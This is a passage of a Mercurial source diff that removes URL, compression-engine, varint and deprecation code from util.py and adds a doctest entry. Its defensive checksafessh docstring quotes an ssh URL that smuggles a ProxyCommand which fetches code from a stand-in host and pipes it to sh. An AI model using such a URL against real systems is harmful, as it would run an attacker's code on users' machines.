- # TODO: similar to the query string, we should not unescape the
- # path when we store it, the path might contain '%2f' = '/',
- # which we should *not* escape.
- s += urlreq.quote(self.path, safe=self._safepchars)
- if self.query:
- # we store the query in escaped form.
- s += '?' + self.query
- if self.fragment is not None:
- s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
- return s
-
- __str__ = encoding.strmethod(__bytes__)
-
- def authinfo(self):
- user, passwd = self.user, self.passwd
- try:
- self.user, self.passwd = None, None
- s = bytes(self)
- finally:
- self.user, self.passwd = user, passwd
- if not self.user:
- return (s, None)
- # authinfo[1] is passed to urllib2 password manager, and its
- # URIs must not contain credentials. The host is passed in the
- # URIs list because Python < 2.4.3 uses only that to search for
- # a password.
- return (s, (None, (s, self.host),
- self.user, self.passwd or ''))
-
- def isabs(self):
- if self.scheme and self.scheme != 'file':
- return True # remote URL
- if hasdriveletter(self.path):
- return True # absolute for our purposes - can't be joined()
- if self.path.startswith(br'\\'):
- return True # Windows UNC path
- if self.path.startswith('/'):
- return True # POSIX-style
- return False
-
- def localpath(self):
- if self.scheme == 'file' or self.scheme == 'bundle':
- path = self.path or '/'
- # For Windows, we need to promote hosts containing drive
- # letters to paths with drive letters.
- if hasdriveletter(self._hostport):
- path = self._hostport + '/' + self.path
- elif (self.host is not None and self.path
- and not hasdriveletter(path)):
- path = '/' + path
- return path
- return self._origpath
-
- def islocal(self):
- '''whether localpath will return something that posixfile can open'''
- return (not self.scheme or self.scheme == 'file'
- or self.scheme == 'bundle')
-
-def hasscheme(path):
- return bool(url(path).scheme)
-
-def hasdriveletter(path):
- return path and path[1:2] == ':' and path[0:1].isalpha()
-
-def urllocalpath(path):
- return url(path, parsequery=False, parsefragment=False).localpath()
-
-def checksafessh(path):
- """check if a path / url is a potentially unsafe ssh exploit (SEC)
-
- This is a sanity check for ssh urls. ssh will parse the first item as
- an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
-    Let's prevent these potentially exploitable urls entirely and warn the
- user.
-
- Raises an error.Abort when the url is unsafe.
- """
- path = urlreq.unquote(path)
- if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
- raise error.Abort(_('potentially unsafe url: %r') %
- (pycompat.bytestr(path),))
-
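A sketch of the check in action (URLs are illustrative): ordinary ssh URLs
pass silently, while a host that would be parsed as an ssh option aborts:

    checksafessh(b'ssh://user@host/repo')             # returns None
    checksafessh(b'ssh://-oProxyCommand=bad/repo')    # raises error.Abort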
-def hidepassword(u):
- '''hide user credential in a url string'''
- u = url(u)
- if u.passwd:
- u.passwd = '***'
- return bytes(u)
-
-def removeauth(u):
- '''remove all authentication information from a url string'''
- u = url(u)
- u.user = u.passwd = None
-    return bytes(u)
-
-timecount = unitcountfn(
- (1, 1e3, _('%.0f s')),
- (100, 1, _('%.1f s')),
- (10, 1, _('%.2f s')),
- (1, 1, _('%.3f s')),
- (100, 0.001, _('%.1f ms')),
- (10, 0.001, _('%.2f ms')),
- (1, 0.001, _('%.3f ms')),
- (100, 0.000001, _('%.1f us')),
- (10, 0.000001, _('%.2f us')),
- (1, 0.000001, _('%.3f us')),
- (100, 0.000000001, _('%.1f ns')),
- (10, 0.000000001, _('%.2f ns')),
- (1, 0.000000001, _('%.3f ns')),
- )
-
-_timenesting = [0]
-
-def timed(func):
- '''Report the execution time of a function call to stderr.
-
- During development, use as a decorator when you need to measure
- the cost of a function, e.g. as follows:
-
- @util.timed
- def foo(a, b, c):
- pass
- '''
-
- def wrapper(*args, **kwargs):
- start = timer()
- indent = 2
- _timenesting[0] += indent
- try:
- return func(*args, **kwargs)
- finally:
- elapsed = timer() - start
- _timenesting[0] -= indent
- stderr.write('%s%s: %s\n' %
- (' ' * _timenesting[0], func.__name__,
- timecount(elapsed)))
- return wrapper
-
-_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
- ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
-
-def sizetoint(s):
-    '''Convert a size specifier to a byte count.
-
- >>> sizetoint(b'30')
- 30
- >>> sizetoint(b'2.2kb')
- 2252
- >>> sizetoint(b'6M')
- 6291456
- '''
- t = s.strip().lower()
- try:
- for k, u in _sizeunits:
- if t.endswith(k):
- return int(float(t[:-len(k)]) * u)
- return int(t)
- except ValueError:
- raise error.ParseError(_("couldn't parse size: %s") % s)
-
-class hooks(object):
- '''A collection of hook functions that can be used to extend a
- function's behavior. Hooks are called in lexicographic order,
- based on the names of their sources.'''
-
- def __init__(self):
- self._hooks = []
-
- def add(self, source, hook):
- self._hooks.append((source, hook))
-
- def __call__(self, *args):
- self._hooks.sort(key=lambda x: x[0])
- results = []
- for source, hook in self._hooks:
- results.append(hook(*args))
- return results
-
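A sketch of the ordering guarantee: sources are sorted lexicographically
at call time, regardless of registration order:

    h = hooks()
    h.add('b-late', lambda x: x * 2)
    h.add('a-early', lambda x: x + 1)
    h(3)    # -> [4, 6]: 'a-early' runs before 'b-late'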
-def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
- '''Yields lines for a nicely formatted stacktrace.
-    Skips the 'skip' last entries, then returns the last 'depth' entries.
- Each file+linenumber is formatted according to fileline.
- Each line is formatted according to line.
- If line is None, it yields:
- length of longest filepath+line number,
- filepath+linenumber,
- function
-
-    Not to be used in production code, but very convenient while developing.
- '''
- entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
- for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
- ][-depth:]
- if entries:
- fnmax = max(len(entry[0]) for entry in entries)
- for fnln, func in entries:
- if line is None:
- yield (fnmax, fnln, func)
- else:
- yield line % (fnmax, fnln, func)
-
-def debugstacktrace(msg='stacktrace', skip=0,
- f=stderr, otherf=stdout, depth=0):
- '''Writes a message to f (stderr) with a nicely formatted stacktrace.
-    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
- By default it will flush stdout first.
-    It can be used everywhere and intentionally does not require a ui object.
-    Not to be used in production code, but very convenient while developing.
- '''
- if otherf:
- otherf.flush()
- f.write('%s at:\n' % msg.rstrip())
- for line in getstackframes(skip + 1, depth=depth):
- f.write(line)
- f.flush()
-
-class dirs(object):
- '''a multiset of directory names from a dirstate or manifest'''
-
- def __init__(self, map, skip=None):
- self._dirs = {}
- addpath = self.addpath
- if safehasattr(map, 'iteritems') and skip is not None:
- for f, s in map.iteritems():
- if s[0] != skip:
- addpath(f)
- else:
- for f in map:
- addpath(f)
-
- def addpath(self, path):
- dirs = self._dirs
- for base in finddirs(path):
- if base in dirs:
- dirs[base] += 1
- return
- dirs[base] = 1
-
- def delpath(self, path):
- dirs = self._dirs
- for base in finddirs(path):
- if dirs[base] > 1:
- dirs[base] -= 1
- return
- del dirs[base]
-
- def __iter__(self):
- return iter(self._dirs)
-
- def __contains__(self, d):
- return d in self._dirs
-
-if safehasattr(parsers, 'dirs'):
- dirs = parsers.dirs
-
-def finddirs(path):
- pos = path.rfind('/')
- while pos != -1:
- yield path[:pos]
- pos = path.rfind('/', 0, pos)
-
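For illustration, finddirs yields every ancestor directory of a
slash-separated path, deepest first:

    >>> list(finddirs(b'a/b/c.txt'))
    ['a/b', 'a']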
-# compression code
-
-SERVERROLE = 'server'
-CLIENTROLE = 'client'
-
-compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
- (u'name', u'serverpriority',
- u'clientpriority'))
-
-class compressormanager(object):
- """Holds registrations of various compression engines.
-
- This class essentially abstracts the differences between compression
- engines to allow new compression formats to be added easily, possibly from
- extensions.
-
- Compressors are registered against the global instance by calling its
- ``register()`` method.
- """
- def __init__(self):
- self._engines = {}
- # Bundle spec human name to engine name.
- self._bundlenames = {}
- # Internal bundle identifier to engine name.
- self._bundletypes = {}
- # Revlog header to engine name.
- self._revlogheaders = {}
- # Wire proto identifier to engine name.
- self._wiretypes = {}
-
- def __getitem__(self, key):
- return self._engines[key]
-
- def __contains__(self, key):
- return key in self._engines
-
- def __iter__(self):
- return iter(self._engines.keys())
-
- def register(self, engine):
- """Register a compression engine with the manager.
-
- The argument must be a ``compressionengine`` instance.
- """
- if not isinstance(engine, compressionengine):
- raise ValueError(_('argument must be a compressionengine'))
-
- name = engine.name()
-
- if name in self._engines:
- raise error.Abort(_('compression engine %s already registered') %
- name)
-
- bundleinfo = engine.bundletype()
- if bundleinfo:
- bundlename, bundletype = bundleinfo
-
- if bundlename in self._bundlenames:
- raise error.Abort(_('bundle name %s already registered') %
- bundlename)
- if bundletype in self._bundletypes:
- raise error.Abort(_('bundle type %s already registered by %s') %
- (bundletype, self._bundletypes[bundletype]))
-
- # No external facing name declared.
- if bundlename:
- self._bundlenames[bundlename] = name
-
- self._bundletypes[bundletype] = name
-
- wiresupport = engine.wireprotosupport()
- if wiresupport:
- wiretype = wiresupport.name
- if wiretype in self._wiretypes:
- raise error.Abort(_('wire protocol compression %s already '
- 'registered by %s') %
- (wiretype, self._wiretypes[wiretype]))
-
- self._wiretypes[wiretype] = name
-
- revlogheader = engine.revlogheader()
- if revlogheader and revlogheader in self._revlogheaders:
- raise error.Abort(_('revlog header %s already registered by %s') %
- (revlogheader, self._revlogheaders[revlogheader]))
-
- if revlogheader:
- self._revlogheaders[revlogheader] = name
-
- self._engines[name] = engine
-
- @property
- def supportedbundlenames(self):
- return set(self._bundlenames.keys())
-
- @property
- def supportedbundletypes(self):
- return set(self._bundletypes.keys())
-
- def forbundlename(self, bundlename):
- """Obtain a compression engine registered to a bundle name.
-
-        Will raise KeyError if the bundle name isn't registered.
-
- Will abort if the engine is known but not available.
- """
- engine = self._engines[self._bundlenames[bundlename]]
- if not engine.available():
- raise error.Abort(_('compression engine %s could not be loaded') %
- engine.name())
- return engine
-
- def forbundletype(self, bundletype):
- """Obtain a compression engine registered to a bundle type.
-
- Will raise KeyError if the bundle type isn't registered.
-
- Will abort if the engine is known but not available.
- """
- engine = self._engines[self._bundletypes[bundletype]]
- if not engine.available():
- raise error.Abort(_('compression engine %s could not be loaded') %
- engine.name())
- return engine
-
- def supportedwireengines(self, role, onlyavailable=True):
- """Obtain compression engines that support the wire protocol.
-
- Returns a list of engines in prioritized order, most desired first.
-
- If ``onlyavailable`` is set, filter out engines that can't be
- loaded.
- """
- assert role in (SERVERROLE, CLIENTROLE)
-
- attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
-
- engines = [self._engines[e] for e in self._wiretypes.values()]
- if onlyavailable:
- engines = [e for e in engines if e.available()]
-
- def getkey(e):
- # Sort first by priority, highest first. In case of tie, sort
- # alphabetically. This is arbitrary, but ensures output is
- # stable.
- w = e.wireprotosupport()
- return -1 * getattr(w, attr), w.name
-
- return list(sorted(engines, key=getkey))
-
- def forwiretype(self, wiretype):
- engine = self._engines[self._wiretypes[wiretype]]
- if not engine.available():
- raise error.Abort(_('compression engine %s could not be loaded') %
- engine.name())
- return engine
-
- def forrevlogheader(self, header):
- """Obtain a compression engine registered to a revlog header.
-
- Will raise KeyError if the revlog header value isn't registered.
- """
- return self._engines[self._revlogheaders[header]]
-
-compengines = compressormanager()
-
-class compressionengine(object):
- """Base class for compression engines.
-
- Compression engines must implement the interface defined by this class.
- """
- def name(self):
- """Returns the name of the compression engine.
-
- This is the key the engine is registered under.
-
- This method must be implemented.
- """
- raise NotImplementedError()
-
- def available(self):
- """Whether the compression engine is available.
-
- The intent of this method is to allow optional compression engines
- that may not be available in all installations (such as engines relying
- on C extensions that may not be present).
- """
- return True
-
- def bundletype(self):
- """Describes bundle identifiers for this engine.
-
- If this compression engine isn't supported for bundles, returns None.
-
- If this engine can be used for bundles, returns a 2-tuple of strings of
- the user-facing "bundle spec" compression name and an internal
- identifier used to denote the compression format within bundles. To
- exclude the name from external usage, set the first element to ``None``.
-
- If bundle compression is supported, the class must also implement
-        ``compressstream`` and ``decompressorreader``.
-
- The docstring of this method is used in the help system to tell users
- about this engine.
- """
- return None
-
- def wireprotosupport(self):
- """Declare support for this compression format on the wire protocol.
-
- If this compression engine isn't supported for compressing wire
- protocol payloads, returns None.
-
- Otherwise, returns ``compenginewireprotosupport`` with the following
- fields:
-
- * String format identifier
- * Integer priority for the server
- * Integer priority for the client
-
- The integer priorities are used to order the advertisement of format
- support by server and client. The highest integer is advertised
- first. Integers with non-positive values aren't advertised.
-
- The priority values are somewhat arbitrary and only used for default
- ordering. The relative order can be changed via config options.
-
- If wire protocol compression is supported, the class must also implement
- ``compressstream`` and ``decompressorreader``.
- """
- return None
-
- def revlogheader(self):
- """Header added to revlog chunks that identifies this engine.
-
- If this engine can be used to compress revlogs, this method should
- return the bytes used to identify chunks compressed with this engine.
- Else, the method should return ``None`` to indicate it does not
- participate in revlog compression.
- """
- return None
-
- def compressstream(self, it, opts=None):
- """Compress an iterator of chunks.
-
- The method receives an iterator (ideally a generator) of chunks of
- bytes to be compressed. It returns an iterator (ideally a generator)
- of bytes of chunks representing the compressed output.
-
- Optionally accepts an argument defining how to perform compression.
- Each engine treats this argument differently.
- """
- raise NotImplementedError()
-
- def decompressorreader(self, fh):
- """Perform decompression on a file object.
-
- Argument is an object with a ``read(size)`` method that returns
- compressed data. Return value is an object with a ``read(size)`` that
- returns uncompressed data.
- """
- raise NotImplementedError()
-
- def revlogcompressor(self, opts=None):
- """Obtain an object that can be used to compress revlog entries.
-
- The object has a ``compress(data)`` method that compresses binary
- data. This method returns compressed binary data or ``None`` if
- the data could not be compressed (too small, not compressible, etc).
- The returned data should have a header uniquely identifying this
- compression format so decompression can be routed to this engine.
- This header should be identified by the ``revlogheader()`` return
- value.
-
- The object has a ``decompress(data)`` method that decompresses
- data. The method will only be called if ``data`` begins with
- ``revlogheader()``. The method should return the raw, uncompressed
- data or raise a ``RevlogError``.
-
- The object is reusable but is not thread safe.
- """
- raise NotImplementedError()
-
-class _zlibengine(compressionengine):
- def name(self):
- return 'zlib'
-
- def bundletype(self):
- """zlib compression using the DEFLATE algorithm.
-
- All Mercurial clients should support this format. The compression
- algorithm strikes a reasonable balance between compression ratio
- and size.
- """
- return 'gzip', 'GZ'
-
- def wireprotosupport(self):
- return compewireprotosupport('zlib', 20, 20)
-
- def revlogheader(self):
- return 'x'
-
- def compressstream(self, it, opts=None):
- opts = opts or {}
-
- z = zlib.compressobj(opts.get('level', -1))
- for chunk in it:
- data = z.compress(chunk)
- # Not all calls to compress emit data. It is cheaper to inspect
-            # here than to feed empty chunks through the generator.
- if data:
- yield data
-
- yield z.flush()
-
- def decompressorreader(self, fh):
- def gen():
- d = zlib.decompressobj()
- for chunk in filechunkiter(fh):
- while chunk:
- # Limit output size to limit memory.
- yield d.decompress(chunk, 2 ** 18)
- chunk = d.unconsumed_tail
-
- return chunkbuffer(gen())
-
- class zlibrevlogcompressor(object):
- def compress(self, data):
- insize = len(data)
- # Caller handles empty input case.
- assert insize > 0
-
- if insize < 44:
- return None
-
- elif insize <= 1000000:
- compressed = zlib.compress(data)
- if len(compressed) < insize:
- return compressed
- return None
-
- # zlib makes an internal copy of the input buffer, doubling
- # memory usage for large inputs. So do streaming compression
- # on large inputs.
- else:
- z = zlib.compressobj()
- parts = []
- pos = 0
- while pos < insize:
- pos2 = pos + 2**20
- parts.append(z.compress(data[pos:pos2]))
- pos = pos2
- parts.append(z.flush())
-
- if sum(map(len, parts)) < insize:
- return ''.join(parts)
- return None
-
- def decompress(self, data):
- try:
- return zlib.decompress(data)
- except zlib.error as e:
- raise error.RevlogError(_('revlog decompress error: %s') %
- forcebytestr(e))
-
- def revlogcompressor(self, opts=None):
- return self.zlibrevlogcompressor()
-
-compengines.register(_zlibengine())
-
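A sketch of reaching an engine through the registry rather than
instantiating one directly; the user-facing bundle name 'gzip' maps to the
zlib engine registered above:

    engine = compengines.forbundlename('gzip')
    data = b''.join(engine.compressstream(iter([b'some payload'])))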
-class _bz2engine(compressionengine):
- def name(self):
- return 'bz2'
-
- def bundletype(self):
- """An algorithm that produces smaller bundles than ``gzip``.
-
- All Mercurial clients should support this format.
-
- This engine will likely produce smaller bundles than ``gzip`` but
- will be significantly slower, both during compression and
- decompression.
-
- If available, the ``zstd`` engine can yield similar or better
- compression at much higher speeds.
- """
- return 'bzip2', 'BZ'
-
- # We declare a protocol name but don't advertise by default because
- # it is slow.
- def wireprotosupport(self):
- return compewireprotosupport('bzip2', 0, 0)
-
- def compressstream(self, it, opts=None):
- opts = opts or {}
- z = bz2.BZ2Compressor(opts.get('level', 9))
- for chunk in it:
- data = z.compress(chunk)
- if data:
- yield data
-
- yield z.flush()
-
- def decompressorreader(self, fh):
- def gen():
- d = bz2.BZ2Decompressor()
- for chunk in filechunkiter(fh):
- yield d.decompress(chunk)
-
- return chunkbuffer(gen())
-
-compengines.register(_bz2engine())
-
-class _truncatedbz2engine(compressionengine):
- def name(self):
- return 'bz2truncated'
-
- def bundletype(self):
- return None, '_truncatedBZ'
-
- # We don't implement compressstream because it is hackily handled elsewhere.
-
- def decompressorreader(self, fh):
- def gen():
- # The input stream doesn't have the 'BZ' header. So add it back.
- d = bz2.BZ2Decompressor()
- d.decompress('BZ')
- for chunk in filechunkiter(fh):
- yield d.decompress(chunk)
-
- return chunkbuffer(gen())
-
-compengines.register(_truncatedbz2engine())
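
The 'BZ' re-feed above works because BZ2Decompressor accepts its input in
arbitrary pieces; the same trick in isolation, using only the stdlib:

    import bz2

    full = bz2.compress(b'payload')
    stripped = full[2:]            # drop the two-byte 'BZ' magic
    d = bz2.BZ2Decompressor()
    d.decompress(b'BZ')            # hand the magic back first
    assert d.decompress(stripped) == b'payload'
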
-
-class _noopengine(compressionengine):
- def name(self):
- return 'none'
-
- def bundletype(self):
- """No compression is performed.
-
- Use this compression engine to explicitly disable compression.
- """
- return 'none', 'UN'
-
-    # Clients always support uncompressed payloads. Servers don't advertise
-    # them by default because, unless you are on a fast network, uncompressed
-    # payloads can easily saturate your network pipe.
- def wireprotosupport(self):
- return compewireprotosupport('none', 0, 10)
-
- # We don't implement revlogheader because it is handled specially
- # in the revlog class.
-
- def compressstream(self, it, opts=None):
- return it
-
- def decompressorreader(self, fh):
- return fh
-
- class nooprevlogcompressor(object):
- def compress(self, data):
- return None
-
- def revlogcompressor(self, opts=None):
- return self.nooprevlogcompressor()
-
-compengines.register(_noopengine())
-
-class _zstdengine(compressionengine):
- def name(self):
- return 'zstd'
-
- @propertycache
- def _module(self):
- # Not all installs have the zstd module available. So defer importing
- # until first access.
- try:
- from . import zstd
- # Force delayed import.
- zstd.__version__
- return zstd
- except ImportError:
- return None
-
- def available(self):
- return bool(self._module)
-
- def bundletype(self):
- """A modern compression algorithm that is fast and highly flexible.
-
- Only supported by Mercurial 4.1 and newer clients.
-
- With the default settings, zstd compression is both faster and yields
- better compression than ``gzip``. It also frequently yields better
- compression than ``bzip2`` while operating at much higher speeds.
-
-        If this engine is available and backwards compatibility is not a
-        concern, it is likely the best choice.
- """
- return 'zstd', 'ZS'
-
- def wireprotosupport(self):
- return compewireprotosupport('zstd', 50, 50)
-
- def revlogheader(self):
- return '\x28'
-
- def compressstream(self, it, opts=None):
- opts = opts or {}
- # zstd level 3 is almost always significantly faster than zlib
- # while providing no worse compression. It strikes a good balance
- # between speed and compression.
- level = opts.get('level', 3)
-
- zstd = self._module
- z = zstd.ZstdCompressor(level=level).compressobj()
- for chunk in it:
- data = z.compress(chunk)
- if data:
- yield data
-
- yield z.flush()
-
- def decompressorreader(self, fh):
- zstd = self._module
- dctx = zstd.ZstdDecompressor()
- return chunkbuffer(dctx.read_from(fh))
-
- class zstdrevlogcompressor(object):
- def __init__(self, zstd, level=3):
- # Writing the content size adds a few bytes to the output. However,
- # it allows decompression to be more optimal since we can
- # pre-allocate a buffer to hold the result.
- self._cctx = zstd.ZstdCompressor(level=level,
- write_content_size=True)
- self._dctx = zstd.ZstdDecompressor()
- self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
- self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
-
- def compress(self, data):
- insize = len(data)
- # Caller handles empty input case.
- assert insize > 0
-
- if insize < 50:
- return None
-
- elif insize <= 1000000:
- compressed = self._cctx.compress(data)
- if len(compressed) < insize:
- return compressed
- return None
- else:
- z = self._cctx.compressobj()
- chunks = []
- pos = 0
- while pos < insize:
- pos2 = pos + self._compinsize
- chunk = z.compress(data[pos:pos2])
- if chunk:
- chunks.append(chunk)
- pos = pos2
- chunks.append(z.flush())
-
- if sum(map(len, chunks)) < insize:
- return ''.join(chunks)
- return None
-
- def decompress(self, data):
- insize = len(data)
-
- try:
- # This was measured to be faster than other streaming
- # decompressors.
- dobj = self._dctx.decompressobj()
- chunks = []
- pos = 0
- while pos < insize:
- pos2 = pos + self._decompinsize
- chunk = dobj.decompress(data[pos:pos2])
- if chunk:
- chunks.append(chunk)
- pos = pos2
-                # The frame should be exhausted; there is no finish() to call.
-
- return ''.join(chunks)
- except Exception as e:
- raise error.RevlogError(_('revlog decompress error: %s') %
- forcebytestr(e))
-
- def revlogcompressor(self, opts=None):
- opts = opts or {}
- return self.zstdrevlogcompressor(self._module,
- level=opts.get('level', 3))
-
-compengines.register(_zstdengine())
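
A sketch of the content-size tradeoff noted in zstdrevlogcompressor, using
the same python-zstandard API the engine exercises (zstd here being the
lazily imported module from above; the sample data is made up):

    cctx = zstd.ZstdCompressor(level=3, write_content_size=True)
    frame = cctx.compress(b'data' * 1000)
    # With the content size recorded in the frame header, one-shot
    # decompression can preallocate its output buffer.
    dctx = zstd.ZstdDecompressor()
    assert dctx.decompress(frame) == b'data' * 1000
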
-
-def bundlecompressiontopics():
- """Obtains a list of available bundle compressions for use in help."""
- # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
- items = {}
-
- # We need to format the docstring. So use a dummy object/type to hold it
- # rather than mutating the original.
- class docobject(object):
- pass
-
- for name in compengines:
- engine = compengines[name]
-
- if not engine.available():
- continue
-
- bt = engine.bundletype()
- if not bt or not bt[0]:
- continue
-
- doc = pycompat.sysstr('``%s``\n %s') % (
- bt[0], engine.bundletype.__doc__)
-
- value = docobject()
- value.__doc__ = doc
- value._origdoc = engine.bundletype.__doc__
- value._origfunc = engine.bundletype
-
- items[bt[0]] = value
-
- return items
-
-i18nfunctions = bundlecompressiontopics().values()
-
-# convenient shortcut
-dst = debugstacktrace
-
-def safename(f, tag, ctx, others=None):
- """
-    Generate a name that is safe to rename f to in the given context.
-
- f: filename to rename
- tag: a string tag that will be included in the new name
- ctx: a context, in which the new name must not exist
- others: a set of other filenames that the new name must not be in
-
- Returns a file name of the form oldname~tag[~number] which does not exist
- in the provided context and is not in the set of other names.
- """
- if others is None:
- others = set()
-
- fn = '%s~%s' % (f, tag)
- if fn not in ctx and fn not in others:
- return fn
- for n in itertools.count(1):
- fn = '%s~%s~%s' % (f, tag, n)
- if fn not in ctx and fn not in others:
- return fn
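
A quick illustration of the naming scheme (a plain set stands in for the
context, since only membership is tested):

    taken = {b'foo~orig', b'foo~orig~1'}
    assert safename(b'foo', b'orig', set()) == b'foo~orig'
    assert safename(b'foo', b'orig', set(), others=taken) == b'foo~orig~2'
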
-
-def readexactly(stream, n):
- '''read n bytes from stream.read and abort if less was available'''
- s = stream.read(n)
- if len(s) < n:
- raise error.Abort(_("stream ended unexpectedly"
- " (got %d bytes, expected %d)")
- % (len(s), n))
- return s
-
-def uvarintencode(value):
- """Encode an unsigned integer value to a varint.
-
- A varint is a variable length integer of 1 or more bytes. Each byte
-    except the last has the most significant bit set. The lower 7 bits of
-    each byte store the value's binary representation, least significant
-    group first.
-
- >>> uvarintencode(0)
- '\\x00'
- >>> uvarintencode(1)
- '\\x01'
- >>> uvarintencode(127)
- '\\x7f'
- >>> uvarintencode(1337)
- '\\xb9\\n'
- >>> uvarintencode(65536)
- '\\x80\\x80\\x04'
- >>> uvarintencode(-1)
- Traceback (most recent call last):
- ...
- ProgrammingError: negative value for uvarint: -1
- """
- if value < 0:
- raise error.ProgrammingError('negative value for uvarint: %d'
- % value)
- bits = value & 0x7f
- value >>= 7
- bytes = []
- while value:
- bytes.append(pycompat.bytechr(0x80 | bits))
- bits = value & 0x7f
- value >>= 7
- bytes.append(pycompat.bytechr(bits))
-
- return ''.join(bytes)
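
Working the 1337 doctest case through by hand:

    # 1337 = 0b1010_0111001
    # low 7 bits:  0b0111001 = 0x39; continuation bit set -> 0xb9
    # remaining:   0b1010    = 0x0a, emitted last ('\n')
    assert uvarintencode(1337) == b'\xb9\n'
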
-
-def uvarintdecodestream(fh):
- """Decode an unsigned variable length integer from a stream.
-
- The passed argument is anything that has a ``.read(N)`` method.
-
- >>> try:
- ... from StringIO import StringIO as BytesIO
- ... except ImportError:
- ... from io import BytesIO
- >>> uvarintdecodestream(BytesIO(b'\\x00'))
- 0
- >>> uvarintdecodestream(BytesIO(b'\\x01'))
- 1
- >>> uvarintdecodestream(BytesIO(b'\\x7f'))
- 127
- >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
- 1337
- >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
- 65536
- >>> uvarintdecodestream(BytesIO(b'\\x80'))
- Traceback (most recent call last):
- ...
- Abort: stream ended unexpectedly (got 0 bytes, expected 1)
- """
- result = 0
- shift = 0
- while True:
- byte = ord(readexactly(fh, 1))
- result |= ((byte & 0x7f) << shift)
- if not (byte & 0x80):
- return result
- shift += 7
-
-###
-# Deprecation warnings for util.py splitting
-###
-
-def _deprecatedfunc(func, version):
- def wrapped(*args, **kwargs):
- fn = pycompat.sysbytes(func.__name__)
- mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
- msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
- nouideprecwarn(msg, version)
- return func(*args, **kwargs)
- wrapped.__name__ = func.__name__
- return wrapped
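
For example, with development warnings enabled, a call through one of the
aliases below warns before delegating. makedate lives in
mercurial.utils.dateutil, so per the wrapper above the message reads:

    # 'util.makedate' is deprecated, use 'utils.dateutil.makedate'
    ts, tz = makedate()    # still returns dateutil.makedate()'s result
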
-
-defaultdateformats = dateutil.defaultdateformats
-extendeddateformats = dateutil.extendeddateformats
-makedate = _deprecatedfunc(dateutil.makedate, '4.6')
-datestr = _deprecatedfunc(dateutil.datestr, '4.6')
-shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
-parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
-strdate = _deprecatedfunc(dateutil.strdate, '4.6')
-parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
-matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
diff --git a/tests/test-doctest.py b/tests/test-doctest.py
--- a/tests/test-doctest.py
+++ b/tests/test-doctest.py
@@ -70,6 +70,7 @@ testmod('mercurial.ui')
testmod('mercurial.url')
testmod('mercurial.util')
testmod('mercurial.util', testtarget='platform')
+testmod('mercurial.utils.stringutil')
testmod('hgext.convert.convcmd')
testmod('hgext.convert.cvsps')
testmod('hgext.convert.filemap')